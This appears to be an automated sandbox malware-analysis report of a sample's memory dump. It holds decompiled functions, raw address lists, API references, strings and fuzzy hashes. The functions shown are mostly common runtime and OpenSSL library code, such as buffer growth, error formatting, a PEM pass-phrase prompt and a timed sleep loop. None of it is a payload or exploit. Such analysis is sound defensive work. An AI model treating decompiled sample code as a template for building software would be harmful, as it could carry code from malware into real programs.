0x004574f2
0x004574f7
0x004574fd
0x004574fe
0x00457500
0x00000000
0x00000000
0x00457502
0x00457509
0x00000000
0x00000000
0x00000000
0x00457509
0x0045750b
0x0045750f
0x00457516
0x00457523
0x0045769f
0x004576a4
0x004576a5
0x004576a6
0x004576a7
0x004576a8
0x004576a9
0x004576aa
0x004576ab
0x004576ac
0x004576ad
0x004576ae
0x004576af
0x004576b5
0x004576ba
0x004576be
0x004576c0
0x004576c2
0x004576ca
0x004576cd
0x004576cf
0x004576d3
0x004576d5
0x004576d7
0x004576d7
0x004576d8
0x004576d8
0x004576d7
0x004576e5
0x004576e8
0x004576ed
0x004576f1
0x004576f3
0x004576f5
0x004576f5
0x004576f9
0x004576fa
0x004576fe
0x004576ff
0x00457703
0x00457704
0x00457708
0x00457709
0x0045770d
0x0045770f
0x00457715
0x00457715
0x00457719
0x00000000
0x00000000
0x0045771f
0x00457721
0x00457725
0x00457727
0x00457730
0x00457730
0x00457733
0x00457772
0x00457772
0x00457786
0x0045778b
0x0045778e
0x00457735
0x00457735
0x00457738
0x0045773a
0x0045773a
0x00457751
0x00457753
0x00457756
0x00457758
0x0045775a
0x00457761
0x00457766
0x00457766
0x00457769
0x00457769
0x00457792
0x00457792
0x00457796
0x00457796
0x00457727
0x0045779a
0x0045779c
0x0045779e
0x004577a0
0x004577a3
0x004577a5
0x004577af
0x004577a7
0x004577a7
0x004577a7
0x004577b3
0x004577b3
0x004577b3
0x004577b9
0x004577ba
0x004577bb
0x004577bf
0x004577c3
0x004577c5
0x00000000
0x00000000
0x00000000
0x004577c5
0x00457715
0x004577cb
0x004577cb
0x004577cf
0x004577d1
0x004577d3
0x004577d7
0x004577e0
0x004577e0
0x004577e4
0x00000000
0x00000000
0x004577ee
0x004577f7
0x004577fe
0x004577ff
0x00457803
0x00457806
0x00457808
0x00000000
0x00000000
0x00000000
0x00457808
0x004577e0
0x0045780a
0x0045780a
0x0045780f
0x00457811
0x00457811
0x00457815
0x00000000
0x00000000
0x0045781d
0x00457826
0x00457829
0x0045782a
0x0045782a
0x0045782a
0x0045782e
0x00457832
0x00000000
0x00000000
0x00000000
0x00457832
0x00457811
0x00457834
0x00457839
0x00000000
0x00000000
0x00000000
0x00457518
0x00457518
0x0045751d
0x00457529
0x00457529
0x0045752d
0x00457531
0x00457536
0x00457538
0x00457540
0x00457540
0x00457542
0x00457543
0x00457547
0x00457551
0x00457554
0x00457558
0x0045755f
0x00457565
0x00457568
0x0045756a
0x0045756e
0x00457571
0x00457575
0x0045757b
0x0045757f
0x00457582
0x00457586
0x00457588
0x00457588
0x0045758e
0x00457590
0x00457592
0x00457592
0x00457596
0x00457596
0x0045759c
0x0045759e
0x004575a2
0x004575ab
0x004575b0
0x004575b1
0x004575b4
0x004575b8
0x004575bc
0x004575bc
0x004575c0
0x004575c6
0x004575d3
0x004575d8
0x004575d8
0x004575df
0x004575e3
0x004575e5
0x004575e9
0x004575f0
0x004575f8
0x00457601
0x00457604
0x00457605
0x00457609
0x0045760b
0x0045760f
0x00457613
0x00457613
0x0045761c
0x0045761e
0x00457622
0x00457626
0x0045762c
0x00457635
0x00457638
0x00457639
0x0045763d
0x00457641
0x00457645
0x00457645
0x0045764b
0x0045764d
0x00457651
0x00457651
0x00457656
0x0045765f
0x00457664
0x00457667
0x0045766b
0x0045766b
0x00457671
0x00457673
0x00457675
0x00457681
0x00457686
0x00457689
0x00457689
0x00457675
0x00457690
0x00457691
0x00457693
0x0045769e
0x0045769e

APIs

__aulldvrm.LIBCMT ref: 004574E9

Strings

, xrefs: 00457482
+, xrefs: 00457475
0123456789ABCDEF, xrefs: 004574D6
UlE, xrefs: 00457596, 004575A9, 004575D1, 004575F6, 0045762A, 0045765D, 0045767F
0123456789abcdef, xrefs: 004574C4

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: __aulldvrm
String ID: $+$0123456789ABCDEF$0123456789abcdef$UlE
API String ID: 1302938615-3129329331
Opcode ID: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction ID: ba297de4fec08f8b73c8771b24cc4328c1ae3ea447eff3a94226dc6813255680
Opcode Fuzzy Hash: 46cac4d1b6a149b0db06dd79d6caabf4c5257fe28ada6b330817daa996fb75e4
Instruction Fuzzy Hash: D181AEB1A087509FD710CF29A84062BBBE5BFC9755F15092EFD8593312E338DD098B96

Uniqueness

Uniqueness Score: -1.00%

Function 00411B10 Relevance: 10.6, APIs: 7, Instructions: 50
timewindowsleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411B10() {
				intOrPtr _v8;
				struct tagMSG _v36;
				long _t9;
				long _t11;
				intOrPtr _t19;

				_t1 = timeGetTime() + 0x1388; // 0x1388
				_t19 = _t1;
				_v8 = _t19;
				_t9 = timeGetTime();
				if(_t19 > _t9) {
					do {
						_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
						if(_t11 == 0) {
							goto L5;
						}
						while(_v36.message != 0x12) {
							DispatchMessageW( &_v36);
							_t11 = PeekMessageW( &_v36, 0, 0, 0, 1);
							if(_t11 != 0) {
								continue;
							}
							goto L5;
						}
						break;
						L5:
						Sleep(0x64);
						_t11 = timeGetTime();
					} while (_v8 > _t11);
					return _t11;
				}
				return _t9;
			}

0x00411b20
0x00411b20
0x00411b26
0x00411b29
0x00411b2d
0x00411b40
0x00411b4c
0x00411b50
0x00000000
0x00000000
0x00411b52
0x00411b5c
0x00411b6a
0x00411b6e
0x00000000
0x00000000
0x00000000
0x00411b6e
0x00000000
0x00411b70
0x00411b72
0x00411b78
0x00411b7a
0x00000000
0x00411b7f
0x00411b85

APIs

timeGetTime.WINMM ref: 00411B1E
timeGetTime.WINMM ref: 00411B29
PeekMessageW.USER32 ref: 00411B4C
DispatchMessageW.USER32 ref: 00411B5C
PeekMessageW.USER32 ref: 00411B6A
Sleep.KERNEL32(00000064), ref: 00411B72
timeGetTime.WINMM ref: 00411B78

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: MessageTimetime$Peek$DispatchSleep
String ID:
API String ID: 3697694649-0
Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 004416EB Relevance: 9.1, APIs: 6, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004416EB(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v32;
				signed int _t16;
				intOrPtr _t17;
				signed int _t19;
				signed int _t20;
				signed int _t30;
				intOrPtr* _t35;
				intOrPtr* _t37;
				signed int* _t40;
				void* _t48;
				signed int _t50;
				signed int _t54;
				signed int _t57;
				intOrPtr _t58;
				intOrPtr _t59;

				_t48 = __edx;
				_t40 = _a4;
				_t65 = _t40;
				if(_t40 != 0) {
					 *_t40 =  *_t40 & 0x00000000;
					_t54 = _a12;
					_t50 = _a8;
					__eflags = _t50;
					if(_t50 == 0) {
						__eflags = _t54;
						if(__eflags == 0) {
							goto L4;
						} else {
							goto L13;
						}
					} else {
						__eflags = _t54;
						if(__eflags == 0) {
							L13:
							_t35 = E00425208(__eflags);
							_t58 = 0x16;
							 *_t35 = _t58;
							E004242D2();
							_t17 = _t58;
							goto L10;
						} else {
							L4:
							__eflags = _t50;
							if(_t50 != 0) {
								 *_t50 = 0;
							}
							_t16 = E00441667(_a16);
							_a4 = _t16;
							__eflags = _t16;
							if(_t16 == 0) {
								L15:
								_t17 = 0;
								goto L10;
							} else {
								_t19 = E0042C160(_t16) + 1;
								 *_t40 = _t19;
								__eflags = _t54;
								if(_t54 == 0) {
									goto L15;
								} else {
									__eflags = _t19 - _t54;
									if(_t19 <= _t54) {
										_t20 = E0042C0FD(_t50, _t54, _a4);
										__eflags = _t20;
										if(_t20 != 0) {
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											_push(0);
											E004242FD(_t40, _t48);
											asm("int3");
											_push(0xc);
											_push(0x508078);
											E00428520(_t40, _t50, _t54);
											_v32 = _v32 & 0x00000000;
											_t56 = _a4;
											__eflags = _a4;
											__eflags = 0 | _a4 != 0x00000000;
											if(__eflags != 0) {
												__eflags = E00448FF4(_t56, 0x7fff) - 0x7fff;
												asm("sbb eax, eax");
												if(__eflags == 0) {
													goto L17;
												} else {
													E00428AF7(7);
													_t12 =  &_v8;
													 *_t12 = _v8 & 0x00000000;
													__eflags =  *_t12;
													_t57 = E00441667(_t56);
													_v32 = _t57;
													_v8 = 0xfffffffe;
													E004417FD();
													_t30 = _t57;
												}
											} else {
												L17:
												 *((intOrPtr*)(E00425208(__eflags))) = 0x16;
												E004242D2();
												_t30 = 0;
											}
											return E00428565(_t30);
										} else {
											goto L15;
										}
									} else {
										_t17 = 0x22;
										L10:
										goto L11;
									}
								}
							}
						}
					}
				} else {
					_t37 = E00425208(_t65);
					_t59 = 0x16;
					 *_t37 = _t59;
					E004242D2();
					_t17 = _t59;
					L11:
					return _t17;
				}
			}

0x004416eb
0x004416ef
0x004416f3
0x004416f5
0x0044170a
0x0044170d
0x00441711
0x00441714
0x00441716
0x0044174d
0x0044174f
0x00000000
0x00000000
0x00000000
0x00000000
0x00441718
0x00441718
0x0044171a
0x00441751
0x00441751
0x00441758
0x00441759
0x0044175b
0x00441760
0x00000000
0x0044171c
0x0044171c
0x0044171c
0x0044171e
0x00441720
0x00441720
0x00441726
0x0044172b
0x0044172f
0x00441731
0x00441775
0x00441775
0x00000000
0x00441733
0x00441739
0x0044173a
0x0044173d
0x0044173f
0x00000000
0x00441741
0x00441741
0x00441743
0x00441769
0x00441771
0x00441773
0x0044177b
0x0044177c
0x0044177d
0x0044177e
0x0044177f
0x00441780
0x00441785
0x00441786
0x00441788
0x0044178d
0x00441792
0x00441798
0x0044179b
0x004417a0
0x004417a2
0x004417c6
0x004417c8
0x004417cc
0x00000000
0x004417ce
0x004417d0
0x004417d6
0x004417d6
0x004417d6
0x004417e1
0x004417e3
0x004417e6
0x004417ed
0x004417f2
0x004417f2
0x004417a4
0x004417a4
0x004417a9
0x004417af
0x004417b4
0x004417b4
0x004417f9
0x00000000
0x00000000
0x00000000
0x00441745
0x00441747
0x00441748
0x00000000
0x00441748
0x00441743
0x0044173f
0x00441731
0x0044171a
0x004416f7
0x004416f7
0x004416fe
0x004416ff
0x00441701
0x00441706
0x00441749
0x0044174c
0x0044174c

APIs

__getenv_helper_nolock.LIBCMT ref: 00441726
__invoke_watson.LIBCMT ref: 00441780
_strlen.LIBCMT ref: 00441734

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

_strnlen.LIBCMT ref: 004417BF
__lock.LIBCMT ref: 004417D0
__getenv_helper_nolock.LIBCMT ref: 004417DB

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
String ID:
API String ID: 3534693527-0
Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD

Uniqueness

Uniqueness Score: -1.00%

Function 004506A0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 119
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 29%

			E004506A0(void* __ebp, intOrPtr _a4, signed int _a8, intOrPtr _a12, char _a16, char _a80, char _a144, signed int _a208, unsigned int _a216, intOrPtr* _a220, intOrPtr _a224) {
				intOrPtr _v0;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				intOrPtr _t35;
				intOrPtr _t43;
				char* _t46;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr* _t57;
				void* _t65;
				void* _t66;
				intOrPtr* _t67;
				unsigned int _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t74;
				signed int _t75;
				void* _t76;
				signed int _t77;

				E0042F7C0(0xd4);
				_t29 =  *0x50ad20; // 0x727261cc
				_a208 = _t29 ^ _t75;
				_t54 = _a224;
				_t68 = _a216;
				_t67 = _a220;
				_t73 = _t68 >> 0x0000000c & 0x00000fff;
				_a8 = _t68 & 0x00000fff;
				_a4 = E00450DF0(_t54, _t65, _t67, _t73, _t68);
				_v0 = E00450870(_t54, _t67, _t73, _t68);
				_t35 = E004513B0(_t54, _t65, _t67, _t73, _t68);
				_t76 = _t75 + 0xc;
				_a12 = _t35;
				if(_a4 == 0) {
					_push(_t68 >> 0x18);
					_push("lib(%lu)");
					_push(0x40);
					_push( &_a144);
					E004567A0(_t68 >> 0x18);
					_t76 = _t76 + 0x10;
				}
				_t81 = _v0;
				if(_v0 == 0) {
					_push(_t73);
					_push("func(%lu)");
					_push(0x40);
					_push( &_a80);
					E004567A0(_t81);
					_t76 = _t76 + 0x10;
				}
				_t74 = _a12;
				_t82 = _t74;
				if(_t74 == 0) {
					_push(_a8);
					_push("reason(%lu)");
					_push(0x40);
					_push( &_a16);
					E004567A0(_t82);
					_t76 = _t76 + 0x10;
				}
				_t55 = _v0;
				_t37 =  !=  ? _t74 :  &_a16;
				_push( !=  ? _t74 :  &_a16);
				_t39 =  !=  ? _t55 :  &_a80;
				_push( !=  ? _t55 :  &_a80);
				_t41 =  !=  ? _a4 :  &_a144;
				E004567A0(_a4, _t67, _t54, "error:%08lX:%s:%s:%s", _t68,  !=  ? _a4 :  &_a144);
				_t57 = _t67;
				_t77 = _t76 + 0x1c;
				_t66 = _t57 + 1;
				do {
					_t43 =  *_t57;
					_t57 = _t57 + 1;
				} while (_t43 != 0);
				if(_t57 - _t66 == _t54 - 1 && _t54 > 4) {
					_t69 = 0;
					_t54 = _t54 + _t67;
					do {
						_t46 = E00431C30(_t67, 0x3a);
						_t77 = _t77 + 8;
						if(_t46 == 0 || _t46 > _t54 - 5 + _t69) {
							_t46 = _t54 - 5 + _t69;
							 *_t46 = 0x3a;
						}
						_t69 = _t69 + 1;
						_t67 = _t46 + 1;
					} while (_t69 < 4);
				}
				return E0042A77E(_t54, _a208 ^ _t77, _t66, _t67, _t68);
			}

0x004506a5
0x004506aa
0x004506b1
0x004506b9
0x004506c2
0x004506cc
0x004506de
0x004506e4
0x004506ee
0x004506f8
0x004506fc
0x00450701
0x00450704
0x0045070d
0x0045071b
0x0045071c
0x00450721
0x00450723
0x00450724
0x00450729
0x00450729
0x0045072c
0x00450731
0x00450733
0x00450734
0x0045073d
0x0045073f
0x00450740
0x00450745
0x00450745
0x00450748
0x0045074c
0x0045074e
0x00450750
0x00450758
0x0045075d
0x0045075f
0x00450760
0x00450765
0x00450765
0x00450768
0x00450772
0x00450777
0x0045077c
0x00450783
0x0045078d
0x00450799
0x0045079e
0x004507a0
0x004507a3
0x004507a6
0x004507a6
0x004507a8
0x004507a9
0x004507b4
0x004507bb
0x004507bd
0x004507c0
0x004507c3
0x004507c8
0x004507cd
0x004507db
0x004507dd
0x004507dd
0x004507e0
0x004507e1
0x004507e4
0x004507c0
0x00450801

APIs

___from_strstr_to_strchr.LIBCMT ref: 004507C3

Strings

func(%lu), xrefs: 00450734
reason(%lu), xrefs: 00450758
lib(%lu), xrefs: 0045071C
error:%08lX:%s:%s:%s, xrefs: 00450792

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ___from_strstr_to_strchr
String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
API String ID: 601868998-2416195885
Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96

Uniqueness

Uniqueness Score: -1.00%

Function 0045AE30 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E0045AE30(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
				void* __edi;
				intOrPtr _t18;
				intOrPtr _t19;
				signed int _t40;
				intOrPtr _t43;
				signed int _t44;
				intOrPtr _t51;
				intOrPtr* _t52;
				intOrPtr _t53;

				_t55 = __ebp;
				_t1 =  &_a8; // 0x463967
				_t53 =  *_t1;
				_t2 =  &_a4; // 0x463967
				_t52 =  *_t2;
				_t43 =  *_t52;
				if(_t43 < _t53) {
					__eflags =  *(_t52 + 8) - _t53;
					if( *(_t52 + 8) < _t53) {
						__eflags = _t53 - 0x5ffffffc;
						if(__eflags <= 0) {
							_t44 = _t53 + 3;
							_t50 = 0xaaaaaaab * _t44 >> 0x20;
							_t18 =  *((intOrPtr*)(_t52 + 4));
							_push(__ebx);
							_t40 = 0xaaaaaaab * _t44 >> 0x20 >> 1 << 2;
							__eflags = _t18;
							if(_t18 != 0) {
								_t19 = E00454FB0(_t50, _t18,  *(_t52 + 8), _t40, ".\\crypto\\buffer\\buffer.c", 0xa6);
							} else {
								_t19 = E00454E50(_t40, ".\\crypto\\buffer\\buffer.c", 0xa4);
							}
							_t51 = _t19;
							__eflags = _t51;
							if(__eflags != 0) {
								__eflags = _t53 -  *_t52;
								 *((intOrPtr*)(_t52 + 4)) = _t51;
								 *(_t52 + 8) = _t40;
								E0042B420( *_t52 + _t51, 0, _t53 -  *_t52);
								 *_t52 = _t53;
								return _t53;
							} else {
								E004512D0(_t40, _t51, _t52, _t55, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0xa9);
								__eflags = 0;
								return 0;
							}
						} else {
							E004512D0(__ebx, __edx, _t52, __ebp, __eflags, 7, 0x69, 0x41, ".\\crypto\\buffer\\buffer.c", 0x9f);
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags =  *((intOrPtr*)(_t52 + 4)) + _t43;
						E0042B420( *((intOrPtr*)(_t52 + 4)) + _t43, 0, _t53 - _t43);
						 *_t52 = _t53;
						return _t53;
					}
				} else {
					E0042B420( *((intOrPtr*)(_t52 + 4)) + _t53, 0, _t43 - _t53);
					 *_t52 = _t53;
					return _t53;
				}
			}

0x0045ae30
0x0045ae31
0x0045ae31
0x0045ae36
0x0045ae36
0x0045ae3a
0x0045ae3e
0x0045ae5a
0x0045ae5d
0x0045ae7b
0x0045ae81
0x0045aea0
0x0045aea8
0x0045aeaa
0x0045aead
0x0045aeb2
0x0045aeb5
0x0045aeb7
0x0045aedd
0x0045aeb9
0x0045aec4
0x0045aec9
0x0045aee5
0x0045aee7
0x0045aee9
0x0045af0f
0x0045af11
0x0045af1a
0x0045af1e
0x0045af26
0x0045af2d
0x0045aeeb
0x0045aefb
0x0045af03
0x0045af0a
0x0045af0a
0x0045ae83
0x0045ae93
0x0045ae9b
0x0045ae9f
0x0045ae9f
0x0045ae5f
0x0045ae67
0x0045ae6c
0x0045ae74
0x0045ae7a
0x0045ae7a
0x0045ae40
0x0045ae4b
0x0045ae53
0x0045ae59
0x0045ae59

APIs

_memset.LIBCMT ref: 0045AE4B
_memset.LIBCMT ref: 0045AE6C

Strings

.\crypto\buffer\buffer.c, xrefs: 0045AE88, 0045AEBE, 0045AED3, 0045AEF0
g9F, xrefs: 0045AE31, 0045AE36, 0045AE63, 0045AF14, 0045AF1D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memset
String ID: .\crypto\buffer\buffer.c$g9F
API String ID: 2102423945-3653307630
Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9

Uniqueness

Uniqueness Score: -1.00%

Function 00425341 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 62%

			E00425341(void* __ebx, void* __edi, intOrPtr _a4) {
				char* _v24;
				intOrPtr _v28;
				signed int _v36;
				signed int _v40;
				short _v300;
				void* __esi;
				void* _t15;
				void* _t17;
				signed int _t20;
				char* _t22;
				signed int _t30;
				void* _t40;
				void* _t42;
				void* _t46;
				void* _t47;
				void* _t49;
				void* _t51;
				signed int _t52;

				if(_a4 != 0) {
					_push(__ebx);
					_t30 = E0043749C(_a4, 0x55);
					if(_t30 < 0x55) {
						_push(__edi);
						_t15 = E00428CDE(_t40, 2 + _t30 * 2);
						_t42 = _t15;
						if(_t42 != 0) {
							_t5 = _t30 + 1; // 0x1
							_t17 = E004374F1(_t42, _t5, _a4, _t5);
							_t52 = _t51 + 0x10;
							if(_t17 != 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E004242FD(_t30, _t40);
								asm("int3");
								_t49 = _t47;
								_push(_t49);
								_t50 = _t52;
								_t20 =  *0x50ad20; // 0x727261cc
								_v40 = _t20 ^ _t52;
								_t22 = _v24;
								_t45 = _v28;
								if(_v28 <= 5 && _t22 != 0 && MultiByteToWideChar(0, 0, _t22, 0xffffffff,  &_v300, 0x83) != 0) {
									E00425A97(_t30, _t40, _t45,  &_v300);
								}
								_pop(_t46);
								return E0042A77E(_t30, _v36 ^ _t50, _t40, _t42, _t46);
							} else {
								_t15 = _t42;
								goto L5;
							}
						} else {
							L5:
							goto L6;
						}
					} else {
						_t15 = 0;
						L6:
						return _t15;
					}
				} else {
					return 0;
				}
			}

0x00425348
0x0042534e
0x00425359
0x00425360
0x0042536d
0x0042536f
0x00425374
0x00425379
0x0042537f
0x00425388
0x0042538d
0x00425392
0x0042539a
0x0042539b
0x0042539c
0x0042539d
0x0042539e
0x0042539f
0x004253a4
0x004253a8
0x004255d8
0x004255d9
0x004255e1
0x004255e8
0x004255eb
0x004255ef
0x004255f5
0x00425620
0x00425626
0x00425630
0x00425639
0x00425394
0x00425394
0x00000000
0x00425394
0x0042537b
0x0042537b
0x00000000
0x0042537b
0x00425362
0x00425362
0x0042537c
0x0042537e
0x0042537e
0x0042534a
0x0042534d
0x0042534d

APIs

_wcsnlen.LIBCMT ref: 00425354

Strings

U, xrefs: 0042535D

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _wcsnlen
String ID: U
API String ID: 3628947076-3372436214
Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD

Uniqueness

Uniqueness Score: -1.00%

Function 00462FF0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00462FF0(intOrPtr* _a4, void _a8, intOrPtr _a12, intOrPtr* _a16) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t10;
				signed int _t11;
				signed int _t14;
				intOrPtr* _t15;
				void* _t16;
				signed int _t19;
				intOrPtr _t20;
				signed int _t26;
				void* _t27;
				intOrPtr* _t28;
				void* _t29;
				intOrPtr* _t33;
				intOrPtr* _t34;
				void* _t36;
				void* _t40;
				void* _t41;

				_t28 = _a16;
				if(_t28 == 0) {
					_t10 = E0047D440();
					_t38 = _a12;
					__eflags = _t10;
					_t24 = _a8;
					_t33 = _a4;
					_t31 =  !=  ? _t10 : "Enter PEM pass phrase:";
					_t11 = E0047D480(_t28, _a12, _t33, 4, _a8,  !=  ? _t10 : "Enter PEM pass phrase:", _a12, _t29);
					_t41 = _t40 + 0x14;
					__eflags = _t11;
					if(__eflags != 0) {
						L9:
						E004512D0(_t24, _t28, _t31, _t38, __eflags, 9, 0x64, 0x6d, ".\\crypto\\pem\\pem_lib.c", 0x6f);
						_t14 = E0042B420(_t33, 0, _t24) | 0xffffffff;
						__eflags = _t14;
					} else {
						do {
							_t15 = _t33;
							_t28 = _t15 + 1;
							do {
								_t26 =  *_t15;
								_t15 = _t15 + 1;
								__eflags = _t26;
							} while (_t26 != 0);
							_t14 = _t15 - _t28;
							__eflags = _t14 - 4;
							if(__eflags < 0) {
								goto L8;
							}
							goto L10;
							L8:
							_push(4);
							_push("phrase is too short, needs to be at least %d chars\n");
							_t16 = E00420E4D();
							E00422408(_t24, _t31, _t33, __eflags);
							_t19 = E0047D480(_t28, _t38, _t33, 4, _t24, _t31, _t38, _t16 + 0x40);
							_t41 = _t41 + 0x20;
							__eflags = _t19;
						} while (__eflags == 0);
						goto L9;
					}
					L10:
					return _t14;
				} else {
					_t34 = _t28;
					_t27 = _t34 + 1;
					do {
						_t20 =  *_t34;
						_t34 = _t34 + 1;
					} while (_t20 != 0);
					_t36 =  >  ? _a8 : _t34 - _t27;
					E0042D8D0(_a4, _t28, _t36);
					return _t36;
				}
			}

0x00462ff0
0x00462ff7
0x00463027
0x0046302c
0x00463030
0x00463032
0x0046303b
0x0046303f
0x00463048
0x0046304d
0x00463050
0x00463052
0x00463095
0x004630a2
0x004630b3
0x004630b3
0x00463054
0x00463054
0x00463054
0x00463056
0x00463060
0x00463060
0x00463062
0x00463063
0x00463063
0x00463067
0x00463069
0x0046306c
0x00000000
0x00000000
0x00000000
0x0046306e
0x0046306e
0x00463070
0x00463075
0x0046307e
0x00463089
0x0046308e
0x00463091
0x00463091
0x00000000
0x00463054
0x004630b6
0x004630ba
0x00462ff9
0x00462ff9
0x00462ffb
0x00463000
0x00463000
0x00463002
0x00463003
0x0046300d
0x00463018
0x00463023
0x00463023

APIs

_fprintf.LIBCMT ref: 0046307E
_memset.LIBCMT ref: 004630AB

Strings

.\crypto\pem\pem_lib.c, xrefs: 00463097
phrase is too short, needs to be at least %d chars, xrefs: 00463070
Enter PEM pass phrase:, xrefs: 00463036, 00463043, 00463084

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _fprintf_memset
